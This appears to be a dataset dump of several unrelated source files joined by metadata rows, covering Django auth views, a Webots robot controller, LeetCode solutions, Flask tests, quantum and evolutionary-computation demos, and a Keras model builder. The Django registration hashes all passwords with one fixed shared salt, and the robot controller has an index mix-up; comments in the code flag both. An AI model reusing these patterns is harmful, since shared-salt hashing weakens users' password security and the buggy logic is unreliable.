        user.password = request.POST.get('pwd')
        try:
            find_user = UserInfo.objects.filter(name=user.name)
            if len(find_user) <= 0:
                messages.add_message(request, messages.ERROR, '该用户未注册')
                return redirect('/user/login')
            if not check_password(user.password, find_user[0].password):
                return render(request, 'login.html',
                              {'user_info': user, 'message_error': '密码错误'})
        except ObjectDoesNotExist as e:
            logging.warning(e)
        return redirect('/')
    # Bug fix: the original redirected non-POST requests to the relative path
    # 'user/login', which resolves against the current URL; use the absolute
    # path like the redirect above.
    return redirect('/user/login')
def register(request):
    """Render the registration form page."""
    return render(request, 'register.html')
def register_in(request):
    """Handle the registration form POST and create a UserInfo row.

    Validation steps: name present, name not already taken, password and
    confirmation match.  Each failure re-renders the form with a distinct
    messageN key consumed by the template.
    """
    if request.method == 'POST':
        new_user = UserInfo()
        new_user.name = request.POST.get('user')
        if not new_user.name:
            return render(request, 'register.html', {'message0': '请输入用户名'})
        try:
            # .get() raises DoesNotExist when the name is free; reaching the
            # body of the `if` means the name is already taken.
            a = UserInfo.objects.get(name=new_user.name)
            if a:
                return render(request, 'register.html', {'message1': '该用户已注册'})
        except ObjectDoesNotExist as e:
            logging.warning(e)
        if request.POST.get('pwd') != request.POST.get('cpwd'):
            return render(request, 'register.html', {'message2': '两次密码不一致'})
        # NOTE(review): auth_check is a fixed salt shared by every user --
        # passing None would let Django generate a per-user random salt.
        new_user.password = make_password(request.POST.get('pwd'), auth_check, 'pbkdf2_sha1')
        new_user.phone = request.POST.get('phone')
        new_user.email = request.POST.get('email')
        try:
            new_user.save()
        except DatabaseError as e:
            logging.warning(e)
        return render(request, 'index.html')
    return render(request, 'register.html')
"yabing_ji@163.com"
] | yabing_ji@163.com |
f9f4751d2e9c05ff20569e2fff730457d677e304 | 57fc5d54f5df359c7a53020fb903f36479d3a322 | /controllers/.history/robot/robot_20201214160008.py | 046d51ee297654183bab7c9b7fcbfad4b3fd37f5 | [] | no_license | shenwuyue-xie/webots_testrobots | 929369b127258d85e66c5275c9366ce1a0eb17c7 | 56e476356f3cf666edad6449e2da874bb4fb4da3 | refs/heads/master | 2023-02-02T11:17:36.017289 | 2020-12-20T08:22:59 | 2020-12-20T08:22:59 | 323,032,362 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,172 | py |
from controller import Robot
from controller import Connector
from controller import Motor
from controller import DistanceSensor
from controller import Device
from controller import PositionSensor
import numpy as np
from deepbots.robots.controllers.robot_emitter_receiver_csv import \
RobotEmitterReceiverCSV
import math
class TaskDecisionRobot(RobotEmitterReceiverCSV):
    """Webots robot controller that exchanges CSV messages with a supervisor.

    Robot "0" is the head module with 7 distance sensors; every other
    module has 4 sensors plus a front connector.  Incoming messages carry
    wheel velocities (slots 0-1) and per-module joint targets (slots 2-13).
    """
    def __init__(self):
        super(TaskDecisionRobot,self).__init__()
        # The robot name doubles as the module index ("0", "1", ...).
        self.name = self.robot.getName()
        self.timestep = int(self.robot.getBasicTimeStep())
        self.setupsensors()
        self.setupmotors()
        self.robot.batterySensorEnable(self.timestep)
    def normalize_to_range(self,value, min, max, newMin, newMax):
        """Linearly map value from [min, max] onto [newMin, newMax]."""
        value = float(value)
        min = float(min)
        max = float(max)
        newMin = float(newMin)
        newMax = float(newMax)
        return (newMax - newMin) / (max - min) * (value - max) + newMax
    def setupsensors(self):
        """Enable the distance sensors: 7 on the head module, otherwise 4."""
        self.distancesensors = []
        if self.name == "0":
            self.n_distancesensors = 7
            self.rearconnector = self.robot.getConnector("rear_connector")
            self.dsNames = ['ds' + str(i) for i in range(self.n_distancesensors)]
            for i in range(self.n_distancesensors):
                self.distancesensors.append(self.robot.getDistanceSensor(self.dsNames[i]))
                self.distancesensors[i].enable(self.timestep)
        else :
            self.n_distancesensors = 4
            self.frontconnector = self.robot.getConnector("front_connector")
            self.rearconnector = self.robot.getConnector("rear_connector")
            self.dsNames = ['ds' + str(i) for i in range(self.n_distancesensors)]
            for i in range(self.n_distancesensors):
                self.distancesensors.append(self.robot.getDistanceSensor(self.dsNames[i]))
                self.distancesensors[i].enable(self.timestep)
    def setupmotors(self):
        """Put the wheel motors in velocity mode and enable the rear encoder."""
        self.leftmotor= self.robot.getMotor('left_motor')
        self.rightmotor= self.robot.getMotor('right_motor')
        self.frontmotor = self.robot.getMotor('front_motor')
        self.rearmotor = self.robot.getMotor('rear_motor')
        # An infinite position target switches a Webots motor to velocity control.
        self.leftmotor.setPosition(float('inf'))
        self.rightmotor.setPosition(float('inf'))
        self.leftmotor.setVelocity(0)
        self.rightmotor.setVelocity(0)
        self.rearpositionsensor = self.rearmotor.getPositionSensor()
        self.rearpositionsensor.enable(self.timestep)
    def create_message(self):
        """Return the outgoing message: one distance reading per sensor."""
        message = []
        for distancesensor in self.distancesensors:
            message.append(distancesensor.getValue())
        return message
    def use_message_data(self,message):
        """Apply an incoming action message to the motors.

        Slots 0-1 are wheel velocities; slots 2-13 are joint commands,
        two per module (front/rear), selected by the robot's name.
        """
        for i in range(2):
            # Map raw actions to backward (-8..-4) or forward (6..12) speeds.
            if float(message[i]) <0:
                message[i] = self.normalize_to_range(float(message[i]),-0.1,0,-8,-4)
            if float(message[i]) >= 0:
                message[i] = self.normalize_to_range(float(message[i]),0,1.1,6,12)
        for j in range(2,14):
            # message[i] = float(message[i])
            # x = np.random.uniform(0,1,12)
            message[j] = self.normalize_to_range(float(message[j]),-0.1,1.1,0,1)
            # NOTE(review): the conditions below index message[i], where i is
            # the leftover value (1) from the previous loop, not j -- they
            # repeatedly rescale the right-wheel velocity instead of the joint
            # command normalised just above.  This looks like an i/j mix-up;
            # confirm whether message[j] was intended.
            if message [i] >= 0 and message[i] <= 0.3:
                message[i] = 0
            elif message [i] > 0.4 and message [i] <= 0.7:
                message[i] = 0
            elif message [i] > 0.8 and message[i] <= 1:
                message[i] = 0
            elif message[i] > 0.7 and message[i] <= 0.8:
                message[i] = self.normalize_to_range(message[i],0.7,0.8,0,math.pi/2)
            elif message[i] > 0.3 and message[i] <= 0.4:
                # NOTE(review): the source range (0, 0.1) does not match the
                # guard range (0.3, 0.4) -- verify the intended mapping.
                message[i] = self.normalize_to_range(message[i],0,0.1,-math.pi/2,0)
        self.leftmotor.setVelocity(message[0])
        self.rightmotor.setVelocity(message[1])
        # Each module consumes its own pair of joint targets.
        self.frontmotor.setPosition(message[int(self.name) * 2 + 2])
        self.rearmotor.setPosition(message[int(self.name) * 2 + 3])
# Instantiate the controller and start its emitter/receiver loop.
controller = TaskDecisionRobot()
controller.run()
| [
"1092673859@qq.com"
] | 1092673859@qq.com |
25ebc6477404f30e4e15e869ae2e7bd4a932b605 | 7950c4faf15ec1dc217391d839ddc21efd174ede | /problems/0092.0_Reverse_Linked_List_II.py | f76687c1bb1a3916b824b332406fc4c4f57eb438 | [] | no_license | lixiang2017/leetcode | f462ecd269c7157aa4f5854f8c1da97ca5375e39 | f93380721b8383817fe2b0d728deca1321c9ef45 | refs/heads/master | 2023-08-25T02:56:58.918792 | 2023-08-22T16:43:36 | 2023-08-22T16:43:36 | 153,090,613 | 5 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,197 | py | '''
I do it only in one pass.
T: O(N)
S: O(1)
Runtime: 64 ms, faster than 13.84% of Python3 online submissions for Reverse Linked List II.
Memory Usage: 13.9 MB, less than 87.01% of Python3 online submissions for Reverse Linked List II.
'''
# Definition for singly-linked list.
# class ListNode:
# def __init__(self, val=0, next=None):
# self.val = val
# self.next = next
class Solution:
    def reverseBetween(self, head: Optional[ListNode], left: int, right: int) -> Optional[ListNode]:
        """Reverse the sublist between positions left and right (1-indexed), in one pass."""
        if left == right:
            return head
        # Sentinel so the case left == 1 needs no special handling.
        sentinel = ListNode(next=head)
        anchor = sentinel
        # Walk to the node just before the section to reverse.
        for _ in range(left - 1):
            anchor = anchor.next
        # The section's first node becomes its tail after reversal.
        section_tail = anchor.next
        prev, cur = None, anchor.next
        remaining = right - left + 1
        # Standard pointer reversal over exactly `remaining` nodes.
        while remaining:
            cur.next, prev, cur = prev, cur, cur.next
            remaining -= 1
        # Reconnect: reversed section's tail -> trailing nodes,
        # leading nodes -> reversed section's head.
        section_tail.next = cur
        anchor.next = prev
        return sentinel.next
'''
no need to check left == right
Runtime: 65 ms, faster than 12.39% of Python3 online submissions for Reverse Linked List II.
Memory Usage: 14.2 MB, less than 18.38% of Python3 online submissions for Reverse Linked List II.
'''
# Definition for singly-linked list.
# class ListNode:
# def __init__(self, val=0, next=None):
# self.val = val
# self.next = next
class Solution:
    def reverseBetween(self, head: Optional[ListNode], left: int, right: int) -> Optional[ListNode]:
        """Reverse nodes from position left to right (1-indexed) in one pass.

        Variant of the solution above without the left == right early
        return: reversing a single-node span is a no-op, so the guard is
        unnecessary.
        """
        # Dummy node so the case left == 1 needs no special handling.
        hair = ListNode(next=head)
        node = hair
        # Walk to the node just before position `left`.
        for _ in range(left - 1):
            node = node.next
        # node.next -> start
        start = tail = node.next
        another = None
        # Standard pointer reversal over right-left+1 nodes.
        for _ in range(right - left + 1):
            nxt = start.next
            start.next = another
            another = start
            start = nxt
        # link tail to trailing nodes
        tail.next = start
        # link heading-nodes to another
        node.next = another
        return hair.next
| [
"838255715@qq.com"
] | 838255715@qq.com |
07576f9b3eec4640fe26ba3cef131645dcdf2a17 | 4b52336c8e5251c759a28d60635cbf8a66615c07 | /scripts/metrical_error.py | 70b487d57b58382d9077b6cd3c9f92c796e0d464 | [] | no_license | sanskrit-kosha/kosha | f51d8681be0dc8a6a9c9656cec446dc03875a1a0 | 39b90ae9265ab1d7408f889a12092788432eb2fb | refs/heads/master | 2023-04-30T02:46:59.005799 | 2023-04-10T05:00:29 | 2023-04-10T05:00:29 | 189,419,853 | 24 | 13 | null | 2020-12-19T08:24:12 | 2019-05-30T13:35:09 | HTML | UTF-8 | Python | false | false | 1,781 | py | #!/usr/bin/python
# -*- coding: utf-8 -*-
"""Tries to identify verses with imperfect meters from given file.
Prerequisites:
Put metrical_error.py file in shreevatsa/sanskrit folder.
Put the input_file to be checked for metrical inconsistencies
Usage from commandline:
python metrical_error.py input_file
python metrical_error.py input_file > log.txt
"""
from __future__ import absolute_import, division, print_function, unicode_literals
import logging
import sys
import codecs
import identifier_pipeline
if __name__ == '__main__':
    # Set logging level.
    logging.getLogger().setLevel(logging.WARNING)
    # Create the meter identifier.
    identifier = identifier_pipeline.IdentifierPipeline()
    # Input file from the command line.
    filein = sys.argv[1]
    # Improvement: open the input through a context manager so the handle is
    # closed even if identification raises part-way through the file (the
    # original never closed it).
    with codecs.open(filein, 'r', 'utf-8') as fin:
        # Accumulate the lines of the current verse.
        verse = ''
        for line in fin:
            # Lines starting with a semicolon are comments; skip them.
            if not line.startswith(';'):
                verse += line
                # A double danda marks the end of a verse: identify its meter.
                if '॥' in line:
                    identifier.IdentifyFromText(verse)
                    debug_info = identifier.AllDebugOutput()
                    # A perfect metrical match produces no report.
                    if 'exact match' in debug_info:
                        pass
                    else:
                        # Imperfect meter: print the verse and diagnostics.
                        print(verse.encode('utf-8'))
                        print(debug_info.encode('utf-8'))
                    # Reset for the next verse.
                    verse = ''
| [
"drdhaval2785@gmail.com"
] | drdhaval2785@gmail.com |
c18b3cb7ee53ef6f4e57c84b67f7d88e779e289e | 65f14cce454ac723c74f70b5d39cdc1a58b6a91b | /test.py | c46fdab8e3a52e9e967ba3e0471969553358af18 | [] | no_license | wagolemusa/FlaskAPis | d9d2b81d4a8520d0f79bf476e6e9d0f8a655d6bf | d916b04a962e72a9142a75d7fc53840fbcfec422 | refs/heads/master | 2020-03-23T15:02:00.408224 | 2018-10-15T15:14:57 | 2018-10-15T15:14:57 | 141,716,049 | 0 | 0 | null | 2018-10-10T16:53:05 | 2018-07-20T13:33:59 | Python | UTF-8 | Python | false | false | 1,829 | py | from app import app
import unittest
class FlaskTestCase(unittest.TestCase):
    """Integration tests covering the app's login, logout and index routes."""

    # Ensure that Flask was set up correctly
    def test_index(self):
        tester = app.test_client(self)
        response = tester.get('/login', content_type='html/text')
        self.assertEqual(response.status_code, 200)

    # Ensure that the login page loads correctly
    def test_login_page_loads(self):
        tester = app.test_client(self)
        response = tester.get('/login', content_type='html/text')
        self.assertFalse(b'Please try again.' in response.data)

    # Ensure that correct credentials log in
    def test_correct_login(self):
        tester = app.test_client(self)
        response = tester.post(
            '/login',
            data=dict(username="admin", password="admin"),
            follow_redirects=True
        )
        self.assertIn(b'You are just login', response.data)

    # Test wrong credentials
    def test_incorrect_login(self):
        tester = app.test_client(self)
        response = tester.post(
            '/login',
            data=dict(username="wrong", password="wrong"),
            follow_redirects=True
        )
        self.assertIn(b'Invalid credentials. Please try again', response.data)

    # Test logout
    # NOTE(review): this posts to /login and never hits a logout endpoint,
    # so the asserted flash text can only appear if login itself emits it --
    # confirm the intended flow.
    def test_logout(self):
        tester = app.test_client(self)
        response = tester.post(
            '/login',
            data=dict(username="admin", password="admin"),
            follow_redirects=True
        )
        self.assertIn(b'You were just Logged out', response.data)

    # Ensure that the main page requires login
    def test_main_route_requires_login(self):
        tester = app.test_client(self)
        response = tester.get('/', follow_redirects=True)
        # Bug fix: assertTrue(b'...', response.data) treated the byte literal
        # as the condition (always truthy) and the page body as the failure
        # message, so the test could never fail.  assertIn checks the body.
        self.assertIn(b'You need to first Login', response.data)

    def test_post_show_up(self):
        tester = app.test_client(self)
        response = tester.post(
            '/login',
            data=dict(username="admin", password="admin"),
            follow_redirects=True
        )
        self.assertIn(b'Im well', response.data)
# Allow running this module directly: python test.py
if __name__ =='__main__':
    unittest.main()
"homiemusa@gmail.com"
] | homiemusa@gmail.com |
bf161dacfe80fdf84648076044416621060b7549 | 2bb90b620f86d0d49f19f01593e1a4cc3c2e7ba8 | /pardus/tags/2008/programming/libs/openexr/actions.py | bbb492342c23594450270c0a93e02d0fe4894b4b | [] | no_license | aligulle1/kuller | bda0d59ce8400aa3c7ba9c7e19589f27313492f7 | 7f98de19be27d7a517fe19a37c814748f7e18ba6 | refs/heads/master | 2021-01-20T02:22:09.451356 | 2013-07-23T17:57:58 | 2013-07-23T17:57:58 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 951 | py | #!/usr/bin/python
# -*- coding: utf-8 -*-
#
# Copyright 2005-2008 TUBITAK/UEKAE
# Licensed under the GNU General Public License, version 2.
# See the file http://www.gnu.org/licenses/old-licenses/gpl-2.0.txt
from pisi.actionsapi import autotools
from pisi.actionsapi import pisitools
from pisi.actionsapi import shelltools
from pisi.actionsapi import get
def setup():
    """Configure the build: shared libs, example and fuzz-test binaries, no static libs."""
    autotools.configure("--enable-shared \
                         --enable-imfexamples \
                         --enable-imffuzztest \
                         --disable-static")
def build():
    """Compile the configured source tree."""
    autotools.make()
def install():
    """Install into the package image with versioned doc/example locations."""
    # documents and examples go to "/usr/share/OpenEXR" without these parameters
    docdir = "/usr/share/doc/%s" % get.srcTAG()
    examplesdir = "%s/examples" % docdir
    autotools.rawInstall("DESTDIR=%s docdir=%s examplesdir=%s" % (get.installDIR(), docdir, examplesdir))
    pisitools.dodoc("AUTHORS", "ChangeLog","NEWS", "README","LICENSE")
| [
"yusuf.aydemir@istanbul.com"
] | yusuf.aydemir@istanbul.com |
7625a749cac98b120e763c7d4acf51ac35d00eba | 09e57dd1374713f06b70d7b37a580130d9bbab0d | /benchmark/startPyquil2055.py | 8182827470465e78a48300f2e0b4bb6f4b4b58b2 | [
"BSD-3-Clause"
] | permissive | UCLA-SEAL/QDiff | ad53650034897abb5941e74539e3aee8edb600ab | d968cbc47fe926b7f88b4adf10490f1edd6f8819 | refs/heads/main | 2023-08-05T04:52:24.961998 | 2021-09-19T02:56:16 | 2021-09-19T02:56:16 | 405,159,939 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,668 | py | # qubit number=4
# total number=30
import pyquil
from pyquil.api import local_forest_runtime, QVMConnection
from pyquil import Program, get_qc
from pyquil.gates import *
import numpy as np
conn = QVMConnection()
def make_circuit()-> Program:
    """Assemble the fixed 4-qubit benchmark circuit.

    The gate sequence is auto-generated (each gate carries its generation
    number in a trailing comment) and is intentionally left as-is.
    """
    prog = Program() # circuit begin
    prog += X(3) # number=1
    prog += H(1) # number=2
    prog += H(2) # number=3
    prog += H(3) # number=4
    prog += Y(3) # number=12
    prog += H(0) # number=5
    prog += H(1) # number=6
    prog += H(2) # number=7
    prog += H(3) # number=8
    prog += H(0) # number=9
    prog += Y(2) # number=10
    prog += Y(2) # number=11
    prog += CNOT(1,0) # number=13
    prog += H(0) # number=15
    prog += CZ(1,0) # number=16
    prog += H(1) # number=20
    prog += H(2) # number=19
    prog += H(0) # number=27
    prog += CZ(3,0) # number=28
    prog += H(0) # number=29
    prog += Z(3) # number=25
    prog += CNOT(3,0) # number=26
    prog += H(0) # number=17
    prog += CNOT(2,0) # number=21
    prog += X(1) # number=23
    prog += CNOT(2,0) # number=22
    # circuit end
    return prog
def summrise_results(bitstrings) -> dict:
    """Count how many times each measured bitstring occurs."""
    counts = {}
    for bits in bitstrings:
        counts[bits] = counts.get(bits, 0) + 1
    return counts
if __name__ == '__main__':
    # Run the circuit on a 4-qubit QVM for 1024 shots.
    prog = make_circuit()
    qvm = get_qc('4q-qvm')
    results = qvm.run_and_measure(prog,1024)
    # Stack the per-qubit measurement arrays into per-shot bitstrings.
    bitstrings = np.vstack([results[i] for i in qvm.qubits()]).T
    bitstrings = [''.join(map(str, l)) for l in bitstrings]
    # Improvement: write through a context manager so the CSV handle is
    # closed even if formatting or printing raises.
    with open("../data/startPyquil2055.csv","w") as writefile:
        print(summrise_results(bitstrings),file=writefile)
| [
"wangjiyuan123@yeah.net"
] | wangjiyuan123@yeah.net |
a630382faf9954faa047953a9d9cd71b7f3b32ca | 75cf6a9fd035883b64ca2309382e0178cf370b43 | /Empirical/python/Artificial-Intelligence-with-Python/Chapter 08/visualization1.py | 87c3154afcfd82ddb65576615f5100e38768a547 | [
"MIT"
] | permissive | ygtfrdes/Program | 171b95b9f32a105185a7bf8ec6c8c1ca9d1eda9d | 1c1e30230f0df50733b160ca73510c41d777edb9 | refs/heads/master | 2022-10-08T13:13:17.861152 | 2019-11-06T04:53:27 | 2019-11-06T04:53:27 | 219,560,170 | 1 | 2 | null | 2022-09-30T19:51:17 | 2019-11-04T17:39:52 | HTML | UTF-8 | Python | false | false | 3,652 | py | #!/usr/bin/python
import numpy as np
import matplotlib.pyplot as plt
from deap import algorithms, base, benchmarks, \
cma, creator, tools
# Function to create a toolbox
def create_toolbox(strategy):
    """Build a DEAP toolbox that minimises the Rastrigin benchmark.

    The toolbox's generate/update hooks are bound to the supplied CMA-ES
    strategy so the caller can drive the ask/tell cycle.
    """
    creator.create("FitnessMin", base.Fitness, weights=(-1.0,))
    creator.create("Individual", list, fitness=creator.FitnessMin)
    toolbox = base.Toolbox()
    toolbox.register("evaluate", benchmarks.rastrigin)
    # Seed the random number generator for reproducible runs
    np.random.seed(7)
    toolbox.register("generate", strategy.generate, creator.Individual)
    toolbox.register("update", strategy.update)
    return toolbox
if __name__ == "__main__":
    # Problem size
    num_individuals = 10
    num_generations = 125
    # Create a strategy using the CMA-ES algorithm
    strategy = cma.Strategy(centroid=[5.0]*num_individuals, sigma=5.0,
                            lambda_=20*num_individuals)
    # Create toolbox based on the above strategy
    toolbox = create_toolbox(strategy)
    # Create hall of fame object (keeps the single best individual seen)
    hall_of_fame = tools.HallOfFame(1)
    # Register the relevant stats
    stats = tools.Statistics(lambda x: x.fitness.values)
    stats.register("avg", np.mean)
    stats.register("std", np.std)
    stats.register("min", np.min)
    stats.register("max", np.max)
    logbook = tools.Logbook()
    logbook.header = "gen", "evals", "std", "min", "avg", "max"
    # Objects that will compile the data.  np.ndarray allocates the arrays
    # uninitialised; every row is overwritten inside the loop below.
    sigma = np.ndarray((num_generations, 1))
    axis_ratio = np.ndarray((num_generations, 1))
    diagD = np.ndarray((num_generations, num_individuals))
    fbest = np.ndarray((num_generations,1))
    best = np.ndarray((num_generations, num_individuals))
    std = np.ndarray((num_generations, num_individuals))
    for gen in range(num_generations):
        # Generate a new population (the CMA-ES "ask" step)
        population = toolbox.generate()
        # Evaluate the individuals
        fitnesses = toolbox.map(toolbox.evaluate, population)
        for ind, fit in zip(population, fitnesses):
            ind.fitness.values = fit
        # Update the strategy with the evaluated individuals (the "tell" step)
        toolbox.update(population)
        # Update the hall of fame and the statistics with the
        # currently evaluated population
        hall_of_fame.update(population)
        record = stats.compile(population)
        logbook.record(evals=len(population), gen=gen, **record)
        print(logbook.stream)
        # Save more data along the evolution
        sigma[gen] = strategy.sigma
        axis_ratio[gen] = max(strategy.diagD)**2/min(strategy.diagD)**2
        diagD[gen, :num_individuals] = strategy.diagD**2
        fbest[gen] = hall_of_fame[0].fitness.values
        best[gen, :num_individuals] = hall_of_fame[0]
        std[gen, :num_individuals] = np.std(population, axis=0)
    # The x-axis will be the number of evaluations
    x = list(range(0, strategy.lambda_ * num_generations, strategy.lambda_))
    avg, max_, min_ = logbook.select("avg", "max", "min")
    plt.figure()
    plt.semilogy(x, avg, "--b")
    plt.semilogy(x, max_, "--b")
    plt.semilogy(x, min_, "-b")
    plt.semilogy(x, fbest, "-c")
    plt.semilogy(x, sigma, "-g")
    plt.semilogy(x, axis_ratio, "-r")
    plt.grid(True)
    plt.title("blue: f-values, green: sigma, red: axis ratio")
    plt.figure()
    plt.plot(x, best)
    plt.grid(True)
    plt.title("Object Variables")
    plt.figure()
    plt.semilogy(x, diagD)
    plt.grid(True)
    plt.title("Scaling (All Main Axes)")
    plt.figure()
    plt.semilogy(x, std)
    plt.grid(True)
    plt.title("Standard Deviations in All Coordinates")
    plt.show()
| [
"githubfortyuds@gmail.com"
] | githubfortyuds@gmail.com |
46d714e2d63f7b3970e142a75ec299f3918e24ab | 849e95a72f4f380d6b31573a0a13e9eccd288838 | /legal-api/src/legal_api/services/filings/validations/conversion.py | d532b344ec36b6abb0179a0ec37385fccec37ac1 | [
"Apache-2.0"
] | permissive | bcgov/lear | d9b27e2b44ba607ca13878357a62a0623d54ddee | d90f11a7b14411b02c07fe97d2c1fc31cd4a9b32 | refs/heads/main | 2023-09-01T11:26:11.058427 | 2023-08-31T20:25:24 | 2023-08-31T20:25:24 | 168,396,249 | 13 | 117 | Apache-2.0 | 2023-09-14T20:52:02 | 2019-01-30T18:49:09 | Python | UTF-8 | Python | false | false | 1,951 | py | # Copyright © 2022 Province of British Columbia
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Validation for the Conversion filing."""
from http import HTTPStatus # pylint: disable=wrong-import-order
from typing import Dict, Optional
from flask_babel import _ as babel # noqa: N813, I004, I001, I003
from legal_api.errors import Error
from legal_api.models import Business
from legal_api.services.filings.validations.common_validations import validate_name_request
from legal_api.services.filings.validations.registration import validate_offices, validate_party
from ...utils import get_str
def validate(business: Business, filing: Dict) -> Optional[Error]:
    """Validate the Conversion filing.

    Returns a BAD_REQUEST Error when the filing is missing or, for firms
    (sole proprietorships and partnerships), when any nested section fails
    validation; returns None when the filing is acceptable.
    """
    filing_type = 'conversion'
    if not filing:
        return Error(HTTPStatus.BAD_REQUEST, [{'error': babel('A valid filing is required.')}])
    legal_type_path = '/filing/business/legalType'
    legal_type = get_str(filing, legal_type_path)
    # Only firm conversions carry the sections validated below.
    if legal_type in [Business.LegalTypes.SOLE_PROP.value, Business.LegalTypes.PARTNERSHIP.value]:
        msg = []
        # nameRequest is optional; validate it only when supplied.
        if filing.get('filing', {}).get('conversion', {}).get('nameRequest', None):
            msg.extend(validate_name_request(filing, legal_type, filing_type))
        msg.extend(validate_party(filing, legal_type, filing_type))
        msg.extend(validate_offices(filing, filing_type))
        if msg:
            return Error(HTTPStatus.BAD_REQUEST, msg)
    return None
| [
"noreply@github.com"
] | bcgov.noreply@github.com |
1229ce4e6ef1de8ce673b6a08aec76352a73ec7f | 2d5171ac7f2640ed73b48aebf4b96e29d5cad818 | /AtcoderProblems/LevelB/147.py | 9b710ddb2985d2bdea5c4d8cb3a478461ada6650 | [] | no_license | kentahoriuchi/Atcorder | d7b8308424175f32d47f24bb15303695780e1611 | f6449d4e9dc7d92210497e3445515fe95b74c659 | refs/heads/master | 2023-06-06T09:26:46.963642 | 2021-06-13T15:08:04 | 2021-06-13T15:08:04 | 255,396,409 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 151 | py | N = int(input())
S = input()
# The word is a repetition of one half iff its length is even and the
# two halves coincide.
half = N // 2
print('Yes' if N % 2 == 0 and S[:half] == S[half:] else 'No')
"dorahori_108@yahoo.co.jp"
] | dorahori_108@yahoo.co.jp |
771f88b1dd03b5d6e62b5589304c1a9ea8911b90 | 0e1e643e864bcb96cf06f14f4cb559b034e114d0 | /Exps_7_v3/Basic_Pyramid_1ch_model_for_import_BN/pyr_1s/L3/step09_1side_L3.py | 58b490c9fdcdf4bd6b952ed9edb68970d1693d28 | [] | no_license | KongBOy/kong_model2 | 33a94a9d2be5b0f28f9d479b3744e1d0e0ebd307 | 1af20b168ffccf0d5293a393a40a9fa9519410b2 | refs/heads/master | 2022-10-14T03:09:22.543998 | 2022-10-06T11:33:42 | 2022-10-06T11:33:42 | 242,080,692 | 3 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,874 | py | #############################################################################################################################################################################################################
#############################################################################################################################################################################################################
### 把 kong_model2 加入 sys.path
import os
from tkinter import S
code_exe_path = os.path.realpath(__file__)                           ### absolute path of the currently executing step file
code_exe_path_element = code_exe_path.split("\\")                    ### split the path to locate the kong_model2 level
kong_layer = code_exe_path_element.index("kong_model2")              ### depth of kong_model2 inside the path
kong_model2_dir = "\\".join(code_exe_path_element[:kong_layer + 1])  ### directory of kong_model2
import sys                                                           ### add kong_model2 to sys.path so project modules import
sys.path.append(kong_model2_dir)
# print(__file__.split("\\")[-1])
# print("    code_exe_path:", code_exe_path)
# print("    code_exe_path_element:", code_exe_path_element)
# print("    kong_layer:", kong_layer)
# print("    kong_model2_dir:", kong_model2_dir)
#############################################################################################################################################################################################################
from step08_b_use_G_generate_I_to_M import I_to_M
from step08_b_use_G_generate_0_util import Tight_crop
from step09_c_train_step import Train_step_I_to_M
from step09_d_KModel_builder_combine_step789 import KModel_builder, MODEL_NAME
import time
start_time = time.time()
###############################################################################################################################################################################################
###############################################################################################################################################################################################
########################################################### Block1
### Block1
#########################################################################################
# Each 7-element list configures the conv-block counts passed to set_unet3's
# conv_block_num, one entry per U-Net level.
# NOTE(review): the exact per-level meaning is inferred from the
# "pyramid_1side_N" naming -- confirm against KModel_builder.set_unet3.
pyramid_1side_1 = [1, 0, 0, 0, 0, 0, 1]
pyramid_1side_2 = [1, 1, 0, 0, 0, 1, 1]
pyramid_1side_3 = [1, 1, 1, 0, 1, 1, 1]
pyramid_1side_4 = [1, 1, 1, 1, 1, 1, 1]
#########################################################################################
# Pre-configured model builders: 32 hidden channels, depth-3 U-Net, BatchNorm,
# valid padding, sigmoid single-channel output; only the conv-block pyramid differs.
ch032_pyramid_1side_1 = KModel_builder().set_model_name(MODEL_NAME.flow_unet2).set_unet3(norm="bn", out_conv_block=True, concat_before_down=True, kernel_size=3, padding="valid", hid_ch= 32, depth_level=3, out_ch=1, unet_acti="sigmoid", conv_block_num=pyramid_1side_1, ch_upper_bound= 2 ** 14)
ch032_pyramid_1side_2 = KModel_builder().set_model_name(MODEL_NAME.flow_unet2).set_unet3(norm="bn", out_conv_block=True, concat_before_down=True, kernel_size=3, padding="valid", hid_ch= 32, depth_level=3, out_ch=1, unet_acti="sigmoid", conv_block_num=pyramid_1side_2, ch_upper_bound= 2 ** 14)
ch032_pyramid_1side_3 = KModel_builder().set_model_name(MODEL_NAME.flow_unet2).set_unet3(norm="bn", out_conv_block=True, concat_before_down=True, kernel_size=3, padding="valid", hid_ch= 32, depth_level=3, out_ch=1, unet_acti="sigmoid", conv_block_num=pyramid_1side_3, ch_upper_bound= 2 ** 14)
ch032_pyramid_1side_4 = KModel_builder().set_model_name(MODEL_NAME.flow_unet2).set_unet3(norm="bn", out_conv_block=True, concat_before_down=True, kernel_size=3, padding="valid", hid_ch= 32, depth_level=3, out_ch=1, unet_acti="sigmoid", conv_block_num=pyramid_1side_4, ch_upper_bound= 2 ** 14)
#########################################################################################
###############################################################################################################################################################################################
if(__name__ == "__main__"):
    # Smoke test: build one model variant, run a dummy forward pass, and
    # trace the graph into TensorBoard.
    import numpy as np
    print("build_model cost time:", time.time() - start_time)
    data = np.zeros(shape=(1, 511, 511, 1))
    use_model = ch032_pyramid_1side_4
    use_model = use_model.build()
    result = use_model.generator(data)
    print(result.shape)
    import tensorflow as tf
    import datetime
    # Write the graph log next to this script, timestamped per run.
    code_exe_dir = "\\".join(code_exe_path_element[:-1])
    log_dir = f"{code_exe_dir}/use_Tensorboard_see_Graph/{datetime.datetime.now().strftime('%Y%m%d-%H%M%S')}"
    tboard_callback = tf.keras.callbacks.TensorBoard(log_dir=log_dir)
    img_inputs = tf.keras.Input(shape=(511, 511, 1))
    use_model.generator(img_inputs)
    use_model.generator.compile(optimizer='adam', loss='mae', metrics=['accuracy'])
    use_model.generator.fit (data, data, epochs=1, callbacks=[tboard_callback])
    print(f"tensorboard --logdir={log_dir}")
| [
"s89334roy@yahoo.com.tw"
] | s89334roy@yahoo.com.tw |
